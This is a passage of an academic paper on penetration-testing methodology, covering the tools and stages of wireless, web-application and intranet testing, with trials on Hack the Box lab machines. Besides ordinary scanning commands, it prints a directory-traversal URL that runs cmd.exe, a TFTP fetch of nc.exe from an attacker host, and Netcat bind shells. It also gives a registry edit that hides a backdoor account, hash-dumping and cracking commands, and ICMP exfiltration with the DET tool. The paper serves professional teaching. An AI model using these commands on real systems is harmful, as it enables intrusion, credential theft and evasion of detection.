Network scanning and device enumeration is key during the early stages of a penetration
test and security analysis. When the network has been scanned and devices have been
footprinted, vulnerability scanning is an appropriate next step, and there are tools to assist a
tester during this stage. The OpenVAS tool is a collection of security tools that perform
vulnerability management functions. It was developed for a client-server architecture, where the
clients request vulnerability scans from the server that performs the scans. Because OpenVAS is
modular, multiple scans can run simultaneously (Ali, Allen, & Heriyanto, 2014, pp. 323-327).
During preparation for an attack, reconnaissance is required to learn about the targets.
The discovery and enumeration phases draw on competing intelligence and involves
unauthorized internal and external scanning.
Exploitation and gaining access. Gaining access to target devices requires the
exploitation of vulnerabilities found during the discovery and enumeration phases. There are two
main classifications of attacks. The first is a direct attack where a target network’s vulnerabilities
are exploited to gain access to potentially critical systems, or to obtain information that can be
used to launch indirect attacks. The second is an indirect attack, which occurs when an attacker 22
uses sequential attacks to compromise the target/s. An example of this is spear phishing and
waterholing attacks (Sood & Enbody, 2014, pp. 37-44).
Patel (2013) references the Social Engineering Toolkit (SET), which is installed by
default on the Kali Linux distribution and is a diverse toolset for social engineering attacks. The
toolkit is capable of both creating emails, malicious attachments and creating/hosting phishing
web pages, also known as a web attack vector. SET contains a mass-emailing option where a
penetration tester can send a phishing email to many email addresses within an organization at
once (Patel, 2013, pp. 37-44).
The SET has a list of website templates that can be used as a web attack vector, but it is
also capable of cloning websites when a URL is provided. The tool performs a get request and
grabs the HTML code of the website, performing the cloning process based on that information.
Using tools like SET can assists in testing the employees of an organization and their ability to
recognize phishing email attempts. If a user were to give up their login credentials of a website,
such as their work Office 365 login, the penetration tester would have the user’s credentials for
their organization. If the user had administrative permissions, either locally on their computer or
on the domain, the penetration tester will be able to utilize those credentials to gain access to the
organization’s network (Patel, 2013, pp. 37-44).
When looking for information on a machine or for ways to access a machine, the tool
enum4linux is a great source for enumerating lightweight directory access protocol (LDAP) and
the server message block (SMB) service. Using valid non-administrative or administrative
credentials, it is possible to find an accessible SMB share and, depending on the permissions,
find a share that can be modified or even utilize to execute remote commands. If a domain
controller server is enumerated, the penetration tester could obtain a list of all active directory 23
(AD) users, groups, devices and shares. This is a step to perform either during enumeration
and/or post exploitation. If the tester does not have a username and password, it is still possible
to find shares and information open to the active directory (AD) group ‘everyone’. The
‘everyone’ group can be an AD or local group and allows anyone to access the resource it is
assigned to, regardless of whether they have an active directory account. In the instance of a file
share that allows members of the ‘everyone’ group to access, a tester can compromise the
security of the file share using enum4linux. If the tester has already exploited and compromised a
workstation and/or has credentials, those credentials can be used to discover and access more
shares on a network depending on the permissions of the compromised credentials. Output for
the enum4linux -help page can be found in Figure 4, located in Appendix B (Velu, 2017, pp.
124-125).
In the realm of exploitation, Metasploit is the most commonly used tool for executing
exploits against known vulnerabilities. There are two versions of Metasploit, Metasploit Pro
which is the paid version and requires a license, and Metasploit Framework which is a free
version and is automatically installed in all Kali Linux distributions. “Metasploit is currently the
world's leading penetration-testing tool, and one of the biggest open-source projects in
information security and penetration testing. It has totally revolutionized the way we can perform
security tests on our systems” (Teixeira, Singh, & Agarwal, 2018, p. 8). Rapid7, which is a
managed security services provider (MSSP) and security product vendor, owns Metasploit Pro
and Framework (Condon, 2019).
The Metasploit Framework (MSF) is broken up into directories of modules. Each
directory has modules that serve a specific purpose, whether it is scanning, auxiliary functions,
exploitation, or post-exploitation. When a penetration tester is trying to gain access to a device, 24
the extensive library of exploitation modules in Metasploit Framework is second to none. The
exploit database is constantly being updated with new modules. The command for updating MSF
is ‘msfupdate’. The tool can also be installed on Windows and MacOS (Teixeira, Singh, &
Agarwal, 2018, pp. 8-17).
Metasploit Framework modules are executed using the ‘use’ command and adding the
path of the module that is needed. MSF users can perform keyword searches of modules by
typing ‘search’ and then the keyword they are looking for. An example is typing
‘search SQL’ and hitting enter, which will list all of the modules that include SQL in the
name or in the description of the module. When executing modules, the settings of the module
need to be set before entering the command ‘run’. See Figure 5, located in Appendix B, for an
example of setting and executing a Metasploit module (Teixeira, Singh, & Agarwal, 2018, pp. 8-
17).
Persistence and spreading. Spreading across the network includes gaining access to
other servers, workstations and whole networks once the penetration tester has gained access to
one or more devices. Persistence involves setting up a backdoor into the machine or machines for
future access.
EC-Council (2017) references Netcat in the book Ethical Hacking and Countermeasures:
Web Application and Data Servers. The Netcat chapter of the book provides the reader with
steps to setup up a backdoor on a compromised computer using either the TFTP port or through
an injected URL. An example is using Netcat to send a webserver the following URL:
http://192.168.0.1/scripts/...%255c./winnt/system32/cmd.exe?/c+dir+c:\ (EC-Council, 2017, p.
54). The URL asks the webserver to show the attacker the listings in the C drive utilizing
Windows’ cmd.exe. Once the pentester has established a command prompt on the target 25
machine, the TFTP port can be used to upload Netcat to the internet information service (IIS)
server using the following command: http://<attacker’sIP>/c+TFTP+i+192.168.0.1+GET+nc.exe
(EC-Council, 2017, p. 54).
The URL asks the tester’s computer for nc.exe, which is Netcat, and to import it to the
IIS server. Once Netcat is uploaded to the Internet Information Service (IIS) server, it can be
executed to become a backdoor by listening on a specific port for commands from the attacker’s
computer. An example of such a command is nc -L -p 12345 -d -e cmd.exe. Respectively, the
options mean to wait and listen for a connection on port 12345, close any connections on the
mentioned port, and to execute cmd.exe (EC-Council, 2017, p. 54).
If there is a file share that is open, or if the penetration tester accessed a file share with
‘modify’ permissions, it is possible to import Netcat to the target device and execute a remote
shell. Once the penetration tester has accessed the target devices file share, the pentester runs one
the following command on a Windows machine; nc -l -p 6996 -e cmd.exe. For a Linux machine,
the command is the same with the exception of cmd.exe, which is replaced with /bin/bash. The
command nc calls Netcat, the -l mean listen, -p 6996 means port 6996, -e cmd.exe means to
execute the mentioned file. This initiates Netcat to listen on the port and execute the terminal or
command prompt. Since Netcat is listening on port 6996 and would run the commands it
receives in the OS’s command line interface (CLI), the penetration tester would run the
following command on their device; nc <target IP> 6996. This initiates a Netcat connection
between the tester’s machine and the target machine (Yerrid, 2013, pp. 33-35).
Because IIS can have remote code execution vulnerabilities, depending on the version of
IIS running, the penetration tester could utilize the Netcat tool to gain access to the server and
establish a hidden persistence on a vulnerable server as part of a penetration test. This only gives 26
the tester the same permissions as the application running, thus a privilege escalation might be
required to gain administrative access to the Windows server (EC-Council, 2017, p. 54).
Mimikatz is a well-known tool that can perform a multitude of functions to assist in
escalating privileges, gaining initial access, and gaining additional active directory information
regarding user accounts and group policies. Mimikatz is also known for its ability to perform the
infamous pass-the-hash function which exploits a vulnerability in the original NTLM that
required only the hash of the password to be correct instead of the password itself when
authenticating to Windows devices. It is not only important to understand how NTLM functions
and what tools can exploit its vulnerabilities but understanding how to use the tool is essential for
a penetration tester, and that is why author gives several other examples of the tool’s use in a real
scenarios (Sharma, 2017, pp. 238-240).
Clercq (2004) and Halton & Weaver (2016) explain the differences between LM, NT,
NTLMv1 and NTLMv2 hashes, and the tool syntax for John the Ripper and Hashcat for cracking
the mentioned hashes. Halton & Weaver (2016) explained the history of each hash and reviewed
steps for cracking the credentials in detail. NT hashes are the oldest hashes used for Windows to
authenticate to a domain and are more easily cracked due to their age and simplistic algorithm.
NTLM, also known as NTHash, is a little harder to crack, and is standard on most modern
Windows machines. Luckily, cracking this hash is not always necessary. NTLM’s most notable
vulnerability is the pass-the-hash technique where an attacker can simply sniff the hash and send
the hashed password to a device for authentication. The device will query the domain controller
with the hash to make sure the hashes match. If hashes match, then the credentials are accepted.
LM and NT are ways that Windows devices store passwords on the machine itself.
The commands to crack LM utilizing Hashcat and JTR are as follows:27
Hashcat = hashcat -m 3000 -a 3 wordlist.txt (Steube, 2019)
John the Ripper = john –format=lm wordlist.txt (Halton & Weaver, 2016, pp. 223-225)
The Commands for cracking NTHash using Hashcat and JTR are as follows:
John the Ripper = john –format=nt wordlist.txt (Halton & Weaver, 2016, pp. 223-225)
Hashcat = hashcat -m 1000 -a 3 wordlist.txt (Steube, 2019).
NTLMv1, also known as Net-NTLM, is a protocol that allows Windows machines
authenticate to a domain. This is an older version of domain authentication and is now
deprecated, but older networks or networks with older hardware/software may still be using this
version. NTLMv2 is the more secure version and has been the default method used since
Windows 2000 (Clercq, 2004).
The commands for cracking NTLMv1 are as follows; John the Ripper = john –
format=netntlm wordlist.txt, Hashcat = hashcat -m 5500 -a 3 wordlist.txt. The commands for
cracking NTLMv2 are as follows; John the Ripper = john –format=netntlmv2 wordlist.txt,
Hashcat = hashcat -m 5600 -a 3 wordlist.txt (Steube, 2019).
Snood & Enbody (2014) explain the process of gaining and maintaining access to a
computer often does not require a direct attack. The authors explain the principles behind the use
of phishing emails to gain access to a target machine. In the spear phishing model that the author
presents, located in Appendix B as Figure 6, the attacker sends an email to the target user, but the
email contains malicious attachment/s that will infect the target computer with a RAT (Remote
Access Trojan). A RAT provides the attacker with a backdoor into the target machine. Once the
RAT is on the target machine, it will either spread itself across the target network, or the attacker
will utilize the RAT to spread more RATs across the network (Sood & Enbody, 2014, p. 23).
28
If the attacker is not caught by an IDS/IPS, then they will eventually find a server that
holds sensitive data as they spread the RAT across the target network, and at that point, the
attacker will have the ability to exfiltrate sensitive data in a manner, which will allow the
attacker to elude detection. This completes the attack in the spear phishing method example, but
there are steps after exfiltration. One of the steps that usually follows exfiltration is covering of
tracks which includes deleting logs of the activity, removing any malware that was used to gain
access to the machine, and reversing any changes made to the machine’s configuration (Sood &
Enbody, 2014, p. 23).
Another way to maintain persistence and exfiltrate data from a target device is to create a
new user account and add the account to local and domain groups. This will help the penetration
tester blend-in with the rest of the activity happening on the computer. The account will want to
be hidden, and in order to hide the new account, the following registry edit needs to be
performed; Reg Add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\
CurrentVersion
\WinLogon\SpecialAccounts\UserList /V account_name /T REG_DWORD /D 0. The
registry path can vary depending on the version of Windows running on the target machine, but
the general idea is the same (Velu, 2017, pp. 471-473).
Data gathering and extraction. Netcat can exfiltrate data from a target device. In order
to perform this function, the Netcat remote shell needs to have a connection to the attacker’s
computer. The penetration tester also needs to know the path to the folder where the file needing
to be exfiltrated rests on the target device. In order to import the file, the ‘tail’ command is used.
For example, if a penetration tester wanted to dump the Linux passwd file, they would run the
29
following command; tail /etc/passwd (Yerrid, 2013, pp. 40-41). In turn, the attacker can crack
the password file offline and at their leisure.
An issue with data exfiltration is the risk of being caught by data loss prevention.
Random access memory (RAM) holds a significant amount of information for an attacker. Tools
like Belkasoft RAM Capturer and MandiantMemoryze can capture system memory, which
allows it to be downloaded as a single image file. Both tools are uploaded to the compromised
machine and used to perform the download of the system’s memory (Velu, 2017, p. 393).
If a penetration tester is trying to capture the active memory of a target, they would most
likely get caught by endpoint protection. In order to avoid this, Metasploit’s Meterpreter has
commands that can run the executable completely in the target machine’s memory using the
following command; execute -H -m -d calc.exe -f. The command runs the calculator app
(calc.exe) as a decoy executable and will upload the memory acquisition program in the system’s
memory. Because a dummy program executes the memory acquisition program, it avoids anti-
virus. The memory acquisition program does not show up as a running process because it is run
in system memory, which assists in avoiding IDS/IPS (Velu, 2017, pp. 394-395).
When exfiltrating information from a target on an organization’s domain, the security
account manager (SAM) database is a prime target. The SAM database contains the usernames
and passwords for the Windows operating system. The passwords are stored as LM or NTLM
hashes in the registry hive. The file path for the SAM is %SystemRoot%/system32/config/SAM,
and the file share for the SAM is mounted at HKLM/SAM (Teixeira, Singh, & Agarwal, 2018).
Metasploit has a module called Smart Hashdump that can import the password hashes
from the SAM database to the penetration tester’s machine where the tester can crack hashes
offline. Once the meterpreter shell is running on the target device and the shell has been placed 30
in the background of the tester’s terminal, the tester can run the Smart Hashdump module at the
following Metasploit path; post/windows/gather/smart_hashdump. Once the module settings
have been set and the module has finished running, the Windows password hashes are placed
into a file on the tester’s machine (Teixeira, Singh, & Agarwal, 2018, pp. 198-200).
Lastly there is the data exfiltration toolkit (DET), which is a tool designed to test data
loss prevention (DLP). DET can exfiltrate data using different protocols and social media such as
Gmail and Twitter. DET uses a client-server architecture, so a server needs to be setup on the
tester’s machine and then a client needs to be installed on the target machine. Valu (2016)
provides the steps for downloading and configuring the DET tool for use. The tool is
downloaded from GitHub using the command ‘git clone https://github.com/sensepost/DET.git’.
Once the repository is cloned and the tester has navigated to the directory, the tester can use the
command ‘pip install -r requirements.txt’ and then the command ‘python det.py’ to complete the
installation of the tool. This is necessary because DET is not installed on Kali Linux by default
(Velu, 2017, pp. 469-471).
The tester can start the DET server using the following command;
python det.py -c ./config-sample.json -p icmp -L. This command starts the server with the
configuration set to listen for packets over Internet control message protocol (ICMP). The
config-sample.json in the command is the configuration file. Once the setup is complete, the
tester can exfiltrate data from the target over ICMP protocol, which will obfuscate the traffic by
making it look like a ping, which helps evade DLP (Velu, 2017, pp. 469-471).
Covering tracks. Removing evidence and indicators of compromise is the second to last
step of a penetration test. Log deletion and removal of installed software is part of covering the
31
tracks left by a penetration test. Log deletion during the penetration test is part of maintaining
stealth on the network to IDS and IPS (Allen & Cardwell, 2016, pp. 331-344).
When cleaning up log files and modifying registry settings and values are important
when trying to avoid detection. Deletion of a log file is more suspicious than a modification of a
log file, especially if the modification is performed with system level permissions on a Windows
server, or root permissions on a Linux device. It is advisable to modify logs instead of deleting
them (Allen & Cardwell, 2016, pp. 331-344).
Removing software, programs, script files and applications used for testing is also an
important step because the software could be used in the future by malicious attackers to
compromise the organization. Leaving the network clean and pristine once testing concludes
shows the organization that the tester possesses professionalism and attention to detail. A
common issue faced during post-test clean-up activities is remembering everything that needs to
be removed or reconfigured. Keeping detailed records and logs of the test, including what
software, programs, script files and applications placed on the target devices, will assist in
cleanup after testing has concluded. Detailed records also assist in creating the penetration test
report for the organization (Allen & Cardwell, 2016, pp. 331-344).
Discussion of the Findings
The purpose of this research was to provide guidance regarding the steps for performing a
penetration test using the most common open-source tools in the three main fields of penetration
testing; wireless, web application, and Intranet. This guidance is for those who possess a deep
understanding of the technical aspects of IT, are passionate about cybersecurity and want a
starting framework that they can utilize in the development of their own penetration testing
methodology. 32
In order to demonstrate the benefits of these tools, thy need to be tested. In this section,
the tools that are tested are: Nmap, ZAP, Nikto, Metasploit, enum4linux, and OpenVAS. I used
devices in hackthebox.eu: 10.10.10.169, 10.10.10.168 and 10.10.10.157. 10.10.10.168 and
10.10.10.157 use Linux operating systems. 10.10.10.169 is a Windows device.
Wireless Tool Benefits
The Aircrack-ng toolset and Kismet tool are the two most commonly used toolsets for
wireless penetration testing given their wide range of capabilities and easy-to-use command line
interfaces. Aircrack-ng hosts multiple tools within its toolset that perform different functions
regarding wireless security testing, credential harvesting and end-point compromise.
Kismet is another wireless security tool known for its ability to assess the security
protocols of wireless networks without connecting to them, as well as identifying networks that
are not on the IEEE 802.11 standard spectrum.
Web Application Testing Results
In web application security testing, there are four main tools used; OWASP’s ZAP,
Nikto, SQLMap, and Burpsuite. Each tool is special in its capabilities and user interface. ZAP
and Burpsuite utilize a graphical user interface (GUI) where SQLMap uses a CLI. Zap uses both
automatic and manual web application security scanning, while Burpsuite utilizes manual testing
as a proxy between the tester’s browser and the web application. ZAP and Burpsuite focus on the
web application security testing in a broad sense, where SQLMap focuses on SQL vulnerabilities
within the web application. These are the most commonly used tools for web application security
testing and penetration testers will be required to familiarize themselves with these tools and how
they function in order to be a well-rounded tester.
33
The first tool tested for web application security was Nikto. To run the initial scan, the
first command was ‘Nikto –host 10.10.10.157’. The default port is 80 for Nikto if there is not a
specified port in the command. Port 80 was found to be an open port during the Nmap scan that
was run during discovery and enumeration in the next section. The results of the Nikto scan are
shown in Figure 7.
Figure 7. Nikto Command and Output From a Generic Scan
Nikto found that the Apache version is out of date and could contain vulnerabilities that a
tester can research online. The Nikto scan also displays the types of HTTP methods that the web
application allows. The HTTP POST method can be a vulnerability if there were a login for that
website where password spraying may occur.
ZAP testing resulted in the discovery that the new Kali Linux version does not contain
ZAP by default, so to install ZAP, the following command must be used ‘apt-get install owasp-
zap’. Once the installation was complete, the command ‘owasp-zap’ started the program. From
the home screen, the automated scan was selected, which was where the specifics were entered.
34
See Figure 8 for a screenshot of the configuration page. See figure 8 and 9 for the results of the
scan.
Figure 8. ZAP Automated Scan Configuration Screen
Note: This screenshot illustrates the input of variables into the scan configuration screen.
Figure 9. ZAP Automated Scan Results
35
Note: This figure illustrates the results of the scan and the tabbed options that show various other
result information.
ZAP searches for known common URL paths and presents the findings, which can be
sorted for convenience. An example would be Figure 9, which shows the column ‘Reason’ sorted
to show the ‘OK’ reason at the top. This mean that the URL exists and returned results when
tested. Much like Nikto, ZAP scans for many URLs and other criteria to present.
Intranet Security Testing Results
The tools for Intranet testing depend on the stage of testing that the penetration tester is
working. The stages of a penetration test are discovery, enumeration, exploitation, privilege
escalation, persistence, covering tracks, and reporting (Ali, Allen, & Heriyanto, 2014, pp. 60-66).
Each stage has a set of tools that work best for what the analyst is trying to accomplish.
Nmap is the most recommended tool for discovery scanning and vulnerability
enumeration. Nmap has been around since 1997 and has been improved over the years so it can
perform a wide range of functions. Syntax for the tool is straight-forward and there is no
shortage of resources that can guide a new penetration tester to the best scan for the environment
they are testing. Between live asset discovery, open port scanning, service version detection, OS
fingerprinting, built-in scripts and scripting capabilities, there are few operations this tool cannot
perform (Lyon, 2008).
When testing Nmap, a tester must perform scans of devices on a network. The first
command run was ‘nmap –v –p- 10.10.10.157 –oG 157portscan.txt’. This scans all of the ports
on the device and outputs the results to the 157portscan.txt file. Once Nmap displayed the open
ports in the output, a service version scan was run that also obtains the info for the OS and runs
Nmap scripts. See Figures 8 and 9 for Nmap command and results.
36
Figure 10. Nmap device enumeration command
Note: This figure illustrated the command switches that identify the service version of the listed
ports and operating system.
As shown in Figure 8, the Apache version of the web server running on port 80 is 2.4.29.
This seems like a lower version of Apache and a penetration tester will be able research that
version of Apache to find known vulnerabilities.
OpenVAS is also a well-known scanning tool used specifically for vulnerability detection
and exploit recommendations. It can perform automated scanning and will display vulnerability
information. This is more detail than Nmap, which displays raw information that the tester must
research to determine if there are vulnerabilities. When enumerating with Nmap, success boils
down to a penetration tester’s familiarity with known vulnerabilities corresponding to different
service versions, and their understanding of how these services function different ports.
In this example, OpenVAS can be installed using the command ‘apt-get install openvas’.
Once OpenVAS is installed, it needs to be setup using the command ‘openvas-setup’. After setup
is complete, the login password and username will appear at the bottom of the page terminal, and
the web user interface (UI) for URL https://127.0.0.1:9392 was loaded. Since the login
37
information was provided during setup, it is easy to login to the web UI. To start a scan, click on
the scan tab at the top of the page, click on the tasks option in the dropdown menu, and then click
on the purple task manager icon on the on the top left side (see Figure 9 for a screenshot).
Figure 11. How to Start a Scan in OpenVAS
Note: This illustrates the icons to click to start a scan in OpenVAS
At the bottom of Figure 11, the scan status is illustrated and the tool is set to refresh every
30 seconds. This begins the OpenVAS vulnerability scan of the IP 10.10.10.157. When the scan
was finished, the status of the scan changed from ‘Requested’ to ‘Done’, which allows the user
to view the vulnerability results as shown in Figure 12. The vulnerabilities will allow a tester to
determine what offensive actions can be taken to compromise the system.
38
Figure 12. Results From OpenVAS Scan
Note: This illustrates the list of vulnerabilities found from the scan of the IP address
10.10.10.157 in OpenVAS
When working on enumeration, enum4linux is a reputable resource. When performing
discovery scanning, it was determined that 10.10.10.169 has lightweight directory access
protocol (LDAP) running, which is how Windows authenticates credentials on a domain. Using
enum4linux with no passwords given and the –a modifier, making the command ‘enum4linux –a
10.10.10.169’, the scan returned valuable data. The most important data was the list of users in
the AD group ‘Domain Users’. See Figure 13 for the screenshot of this output.
39
Figure 13 - Enum4linux LDAP Output
Note: This lists the user accounts found in the active directory group ‘Domain Users’ during the
enumeration of LDAP using enum4linux
In addition to the list of users in the ‘Domain Users’ group, there was the list of all users
within the entire domain. See Figure 12 for the screenshot of all users. Other information
provided by this tool is the password policy for the domain “megabank”, which is the domain for
the server. See Figure 13 for the password policy screenshot.
40
Figure 14. Enum4linux Users Output
Note: This screenshot lists all the user accounts found on 10.10.10.169 during LDAP
enumeration
41
Figure 15. Enum4linux Password Policy Output
Note: This figure illustrates the fact that the password policy can be found in the output of the
LDAP enumeration using enum4linux
Enum4linux is a useful tool that can provide valuable information when used correctly.
Once the target is known and enumerated, exploitation and gaining access to the machines are
the next steps. When it comes to exploitation, Metasploit is second to none. Metasploit is the
most commonly used tool for exploiting vulnerabilities, as it has pre-configured exploit modules
that were designed to exploit specific vulnerabilities. This allows for exploit automation and the
capability for a less-advanced penetration tester to perform exploitation of vulnerabilities that
would otherwise would not have had the technical capabilities to perform. The tool also includes
modules for scanning, enumeration, exploitation and post-exploitation.
Post-exploitation and persistence are part of what allows a penetration tester to continue a
test after initial exploitation and access a machine. This includes privilege escalation, moving
42
laterally to other machines across the intranet, monitoring and logging on devices, and the
creation of backdoors for future access. Because of the multitude of tasks involved, there are
tools designed to assist in the performance of each specific task, and can sometimes be
dependent on the OS of the compromised machine.
Obtaining and using passwords found on a machine is one way to gain access while
remaining anonymous on the network. Utilizing authorized credentials allows for easier access to
a machine remotely by installing backdoors, but it also allows the penetration tester to look at
file shares and the security account manager (SAM) database without arousing suspicion. This is
a very important step in the penetration testing methodology for initially obtaining and
maintaining access. Domain user accounts provide access to any computers and file shares that
the domain user has access to, which is beneficial for spreading across the network. A domain
administrator account provides more access to all of the devices on the organization’s domain,
including administrative permissions to all of the servers and workstations.
Netcat can be used as a backdoor and for data exfiltration. Metasploit’s Meterpreter is
also used for creating and maintaining a backdoor on to the machine. Meterpreter includes
stealth capabilities by executing commands using dummy processes and having those processes
use the Windows command shell in the background for executing commands remotely. This is
one way of bypassing anti-virus (AV) and IDS. Meterpreter also has a module called Smart
Hashdump that can download the local running memory of the machine for analysis. Other open-
source tools in Kali Linux are made for downloading local memory, such as Belkasoft RAM
Capturer and Mandiant Memoryze. Lastly, the Data Exfiltration Tool (DET) is specifically made
for exfiltrating data discretely and was designed for data loss prevention (DLP) testing.
43
Remaining undetected is critical for a penetration tester and each tool has functions
designed to assist in obfuscation and stealth. Tools are not enough to remain undetected when
performing a penetration test. A penetration tester must use knowledge of networking and OS
operations and configurations in order to stay hidden from IDS/IPS. Creating legitimate local and
AD accounts for persistence will reduce the likelihood that future activities will be viewed as
suspicious by a security incident and event manager (SIEM) or user behavioral analytics (UBA).
After the penetration test completes, it is important to remove anything on the
organization’s network and systems that have not been removed already. This includes deleting
any accounts created, resetting any permissions and registry keys modified, and removing any
software or files/folders placed on devices. Cleaning up and removing anything that could be
used by a real attacker in the future is part of the penetration testing process and should never be
skipped or taken lightly. The purpose of a security analysis and penetration test is to benefit the
organization by highlighting security weaknesses, thus increasing the organization’s security
posture. When an analysis or test placing the organization at greater risk, it constitutes a failure
of that test and of the testers.
Commonalities
There were several commonalities that were found between the different penetration
testing sections and toolsets. According to the Literature Review, the first step in any penetration
test is intelligence gathering, regardless of which portion of an organization is being tested.
Knowing as much about the organization’s operations, people, and threat vectors is necessary for
a strong beginning to a penetration test. OSINT is the practice of gathering information from
open-source tools and platforms, such as social media and search engines. Social engineering is
one of the main reasons for performing OSINT, as it may be useful to know certain personal
44
information in order to craft a social engineering attack that has the highest chance of
successfully obtaining sensitive information. A penetration tester can easily compromise an
organization by tricking one of their employees into opening a malicious attachment containing
custom malware. This could compromise the machine and give the penetration tester credentials
that they could use to perform other penetration tests, such as wireless or intranet testing.
Another commonality was the penetration testing tools used for different testing fields. In
both wireless network security testing and intranet security testing, decryption or hash-cracking
was required for various reasons. John the Ripper (JTR) was suggested for hash-cracking and
decryption in both wireless and physical network security as it has the capability to crack
encryption and hashes for both passwords and wireless security protocols. JTR was also
suggested for cracking the hashes of Windows credentials taken from a compromised machine.
There are also areas where testing fields become sub-tasks for one another. For example,
there may be web applications discovered during in an intranet a penetration test. Organizations
often use web portals for corporate tool and resource logins, such as SolarWinds’ Orion network
solution. Orion can be used as an organization’s IP Address Management (IPAM) resource,
which would allow the tester to view what each subnet of the company’s intranet is used for, and
even view what devices are using which IP address within those networks. This would allow the
tester to focus on the high-value targets, such as the domain controller (DC), the domain name
server (DNS), database servers and others.
One tool that mixes wireless security testing and end-point compromise is Aircrack-ng.
Aircrack-ng allows for the performance of a man-in-the-middle attacks that could either
compromise a workstation or get credentials from the user. Credentials phished from a user using
45
a fake wireless logon page, could be used during intranet security testing when the penetration
tester wants to perform privilege escalation or move laterally across the network.
Web application, wireless and Intranet testing merge when a web application has been
compromised, which can provide credentials to access a wireless network where Intranet testing
can begin. Compromising Internet-facing web applications can also provide access to the web
server itself, which in-turn can provide the tester with access to an internal network depending on
the way the organization has their web servers networked.
Many variables determine the paths that an analyst takes during a penetration test. There
are several points where wireless testing, web application testing, and intranet testing intersect
during a fully scoped penetration test. Having a good toolset, along with in-depth knowledge of
those tools, will provide a penetration tester with the ability to perform the test and be successful.
For wireless testing, Kismet and Aircrack-ng tool suite are the tools that will provide the best
results. ZAP, Nikto, SQLMap and Burpsuite are the best tools for testing web application
security. Nmap, OpenVAS, Metasploit, Meterpreter, Netcat, and DET are comprehensive tools
that will provide the best results during the first five stages of an intranet penetration test.
Keeping detailed records and logs of the penetration test is the best practice for successfully
performing the final two stages of a penetration test.
Conclusion
A lack of advanced knowledge and experience of cybersecurity technologies and
concepts are the main factors that keep information technology professionals away from the
cybersecurity industry. Knowledge of advanced information technology functions and familiarity
with cybersecurity processes and technologies are required to begin a career in cybersecurity.
Knowing where to begin can be difficult, and there are many separate but beneficial sources 46
containing information about cybersecurity processes and technologies. Few sources have
combined information into a penetration testing template with tool use and syntax for performing
a penetration test.
There is no shortage of tools available for security and penetration testing. Many tools
have enough functionality, but not all of the tools are user-friendly or cover a wide range of
functions. Some tools are specifically designed to test one aspect of an environment, such as
wireless networks or SQL. Other tools can perform multiple functions, such as Nmap, which
performs network discovery and enumeration, or Metasploit that can perform functions at every
stage of the penetration testing process. Some tools are more commonly used and more popular
than others, depending on their effectiveness. Because those tools are often more effective, it is
beneficial for a prospective penetration tester or security analyst to learn the purpose, scope, and
syntax for each of these tools. Not all the tools and toolsets are executed using the command line,
but familiarity with the tool’s capabilities and operation are required for effectiveness.
Understanding a tool’s capabilities and operations are only part of the process of a
penetration test. An analyst must know the penetration testing process through standards and
authoritative sources. The penetration testing standard is a guide that can help a new tester with
the methodology and mindset required to perform a thorough and successful test and analysis of
an organization’s information systems security. The ability to be inquisitive, read logs and
investigate leads are a penetration tester’s personal strengths and skills outside of their toolsets.
Security analysis and testing is a job for those who have a passion for cybersecurity work.
An ability to think outside of the box is required when searching for vulnerabilities that everyone
else has yet to find. The tester’s tools are their arsenal, which allows them to use their
knowledge, inquisitiveness, and passion to perform an analysis and penetration test.47
There are always going to be new technologies being used by organizations around the
world, and technology is always going to evolve. A pentester must constantly learn about new
technologies that are available and be ready to perform an analysis and test those devices,
programs, protocols and processes. Knowledge, experience, passion, inquisitiveness, and an
understanding of the toolsets will begin a career in cybersecurity. Continuous education is the
key to a career in cybersecurity.
48
References
Ahmadzadeh, A., Hajihassani, O., & Gorgin, S. (2017). A high-performance and energy-efficient
exhaustive key search approach via GPU on DES-like cryptosystems. The Journal of
Supercomputing.
Ali, S., Allen, L., & Heriyanto, T. (2014). Kali Linux – Assuring Security by Penetration
Testing. Birmingham, UK: Packt Publishing.
Alisherov, F., & Sattarova, F. (2009). Methodology for Penetration Testing. Sandy Bay,
Tasmania, Australia: International Journal of of Grid and Distributed Computing.
Allen, L., & Cardwell, K. (2016). Penetration Testing Execution Standard. Birmingham, UK:
Packt Publishing.
Andress, J., & Winterfeld, S. (2014). Cyber Warfare Techniques, Tactics and Tools for Security
Practitioners. Waltham: Syngress.
Aruba Networks. (2019). Working with Intrusion Detection. Retrieved from Aruba Networks
Tech Docs:
https://www.arubanetworks.com/techdocs/ArubaOS_63_Web_Help/Content/
ArubaFrameStyles/New_WIP/Intrusion_Detection.htm#new_wip_1365762209_1030491
Bahybars-Hawks, B. (2015). New Media Politics: Rethinking Activism and National Security in
Cyberspace. Newcastle, UK: Cambridge Scholars Publishing.
Beggs, R. (2017). Mastering Kali Linux for Advanced Penetration Testing (Second ed.).
Birmingham, UK: Packt Publishing.
Bjetlich, R. (2013). The Practice of Network Security Monitoring: Understanding Incident
Detection and Response. San Francisco, California, United States: The Starch Press.
49
Broad, J., & Bindner, A. (2014). Hacking with Kali : Practical Penetration Testing Techniques.
Waltham: Syngress.
Clercq, J. d. (2004). Windows Server 2003 Security Infrastructure: Core Security Features.
Amsterdam, Netherlands: Digital Press.
Condon, C. (2019). Metasploit Framework. Retrieved from GitHub:
https://github.com/rapid7/metasploit-framework/wiki
Crumpler, W., & Lewis, J. A. (2019). The Cybersecurity Workforce Gap. District of Columbia:
Center for Strateic & International Studies. Retrieved from
https://virginiacyberalliancecareers.org/wp-content/uploads/190129_The-Cybersecurity-
Workforce-Gap.pdf
Cylance Data Science Team. (2017). Introduction to Artificial Intelligence for Security
Professionals. Irvine: The Cylance Press.
Duric, Z. (2014). WAPTT - Web Application Penetration Testing Tool. Advances in Electrical
and Computer Engineering. Retrieved from Directory of Open Access Journals.
EC-Council. (2017). Ethical Hacking and Countermeasures: Web Applications and Data
Servers (Second ed.). Boston, MA: Cengage Learning.
EC-Council Press. (2017). Ethical Hacking and Countermeasures: Attack Phases (Second ed.).
Boston: Cengage Learning.
Engebreston, P. (2013). The Basics of Hacking and Penetration Testing : Ethical Hacking and
Penetration Testing Made Easy. Waltham: Syngress.
Fadyushin, V., & Popov, A. (2016). Building a Pentesting Lab for Wireless Networks.
Birmingham, UK: Packt Publishing.
50
Ford, V. (2017). Build Your Own Lab. Retrieved from National Cybersecurity Student
Organization: https://www.cyberstudents.org/blog-post/build-your-own-lab/
Gregg, M., & Watkins, S. (2006). Hack the Stack : Using Snort and Ethereal to Master The 8
Layers of An Insecure Network. Rockland, MA, United States: Syngress.
Hack the Box. (2019). About. Retrieved from Hack the Box: https://www.hackthebox.eu/
Halton, W., & Weaver, B. (2016). Kali Linux 2: Windows Penetration Testing. Birmingham,
